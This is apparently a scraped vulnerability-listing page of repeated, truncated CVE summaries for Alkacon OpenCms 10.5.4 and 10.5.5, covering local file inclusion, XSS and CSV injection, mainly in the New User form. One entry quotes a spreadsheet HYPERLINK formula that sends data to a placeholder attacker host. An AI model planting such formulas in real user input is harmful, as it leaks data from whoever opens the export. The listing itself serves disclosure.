CVE-2019-13237

In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, groupnew.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp...

CVE-2019-13237

CVE-2019-13237 affects Alkacon OpenCms 10.5.4 and 10.5.5, where Local File Inclusion allows access to server resources via multiple JSP endpoints (e.g., loginmessage.jsp, xmlcontentrepair.jsp, history/index.jsp, and others). The root cause is improper access control in resources such as clearhist...

CVE-2019-13236

In system/workplace/ in Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple Reflected and Stored XSS issues in the management interface...

CVE-2019-13236

Alkacon OpenCms 10.5.4 and 10.5.5 are affected by multiple Reflected and Stored XSS vulnerabilities in the system/workplace/ management interface. Root cause is not explicitly detailed beyond XSS in the provided documents. The issues could allow execution of arbitrary scripts in authenticated use...

CVE-2019-13235

In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the Login form...

CVE-2019-13235

CVE-2019-13235 affects Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, with a Cross-Site Scripting (XSS) flaw in the login form. Public sources describe the vulnerability as an XSS in the login workflow, with PoCs showing injection potentially via headers like X-Forwarded-For. NVD metrics list...

CVE-2019-13234

In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the search engine...

CVE-2019-13234

CVE-2019-13234 involves XSS in the Alkacon OpenCms Apollo Template, specifically in the search engine for OpenCms Apollo Template 10.5.4 and 10.5.5. The connected documents confirm a reflected XSS vulnerability in the search endpoint (e.g., parameter q) and also show a related XSS condition in a ...

OpenCMS 10.5.4 Cross Site Scripting

Description: OpenCMS v10.5.4 and before is vulnerable to cross site scripting in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used in PoC is...

OpenCMS 10.5.4 CSV Injection

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New User module for parameter First Name and Last Name Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

Cross site scripting

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

Code injection

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11819

Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...

CVE-2019-11819

CVE-2019-11819 affects Alkacon OpenCMS v10.5.4 and earlier. The vulnerability is a CSV (Excel Macro) Injection in the New User module (path: /opencms/system/workplace/admin/accounts/user_new.jsp) triggered via the First Name or Last Name fields. The connected documents confirm the same issue acro...

CVE-2019-11818

Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...

CVE-2019-11818

CVE-2019-11818 affects Alkacon OpenCMS v10.5.4 and earlier. The stored XSS vulnerability resides in the New User module (opencms/system/workplace/admin/accounts/user_new.jsp), allowing attackers to inject arbitrary JavaScript via First Name or Last Name fields; the payload is executed when the af...